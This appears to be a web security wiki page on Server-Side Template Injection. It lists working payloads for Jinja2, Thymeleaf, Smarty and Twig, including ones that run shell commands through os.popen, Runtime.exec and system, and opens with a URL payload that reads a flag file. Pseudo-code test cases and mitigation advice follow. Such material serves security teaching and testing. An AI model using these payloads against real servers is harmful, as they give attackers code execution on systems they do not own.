SSTI

http://IP:PORT/{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read() }}

Description

Server-Side Template Injection (SSTI) occurs when user input is embedded directly into a server-side template, allowing attackers to inject and execute arbitrary code on the server.

Example with Scenario

Scenario: A web application uses a template engine to render web pages, and it incorporates user input directly into the template without proper sanitization. An attacker can craft malicious input to manipulate the template engine and execute arbitrary code.

Payloads and Test Cases

Payloads

Jinja2 (Python):
```
{{ 7*7 }}
{{ config.items() }}
```

Thymeleaf (Java):

${T(java.lang.Runtime).getRuntime().exec("ls")}

Smarty (PHP):
```
{$smarty.version}
{php}echo `ls`;{/php}
```
Twig (PHP):
```
{{ 7*7 }}
{{ system('ls') }}
```

Test Cases

Jinja2 (Python):

Payload:

{{ 7*7 }}
{{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}

Test Case:

# Send payload to the server
sendPayloadToServer("{{ 7*7 }}")
# Verify if the template rendered the expression correctly
checkResponseForValue("49")

sendPayloadToServer("{{ ''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('ls').read() }}")
# Verify if the command executed correctly
checkResponseForCommandExecution("ls")

Thymeleaf (Java):

Payload:

${7*7}
${T(java.lang.Runtime).getRuntime().exec("ls")}

Test Case:

// Send payload to the server
sendPayloadToServer("${7*7}")
// Verify if the template rendered the expression correctly
checkResponseForValue("49")

sendPayloadToServer("${T(java.lang.Runtime).getRuntime().exec('ls')}")
// Verify if the command executed correctly
checkResponseForCommandExecution("ls")

Smarty (PHP):

Payload:
```
{$smarty.version}
{php}echo `ls`;{/php}
```

Test Case:

// Send payload to the server
sendPayloadToServer("{$smarty.version}")
// Verify if the template rendered the expression correctly
checkResponseForSmartyVersion()

sendPayloadToServer("{php}echo `ls`;{/php}")
// Verify if the command executed correctly
checkResponseForCommandExecution("ls")

Twig (PHP):

Payload:
```
{{ 7*7 }}
{{ system('ls') }}
```

Test Case:

// Send payload to the server
sendPayloadToServer("{{ 7*7 }}")
// Verify if the template rendered the expression correctly
checkResponseForValue("49")

sendPayloadToServer("{{ system('ls') }}")
// Verify if the command executed correctly
checkResponseForCommandExecution("ls")

Mitigation

Input Sanitization:
- Sanitize user input to ensure it does not contain malicious code.
- Use escaping functions to properly escape user input before embedding it in templates.
Use Safe Template Engines:
- Use template engines that do not allow arbitrary code execution or have strict separation between logic and presentation.
- Configure template engines to disable or restrict dynamic code execution features.
Content Security Policy (CSP):
- Implement a strict Content Security Policy to limit the sources from which content can be loaded.
- Use CSP to prevent the execution of inline scripts and styles.
Whitelist Allowable Expressions:
- Define and enforce a whitelist of allowable template expressions.
- Restrict the use of dynamic expressions and variables within templates.
Security Testing:
- Conduct regular security testing, including fuzzing and penetration testing, to identify and mitigate SSTI vulnerabilities.
- Use automated security tools to detect and prevent SSTI vulnerabilities in your codebase.

PreviousIDOR NextBroken Access Control/Privilege Escalation

Last updated 1 year ago

hashtagDescription

hashtagExample with Scenario

hashtagPayloads and Test Cases

hashtagMitigation

Description

Example with Scenario

Payloads and Test Cases

Mitigation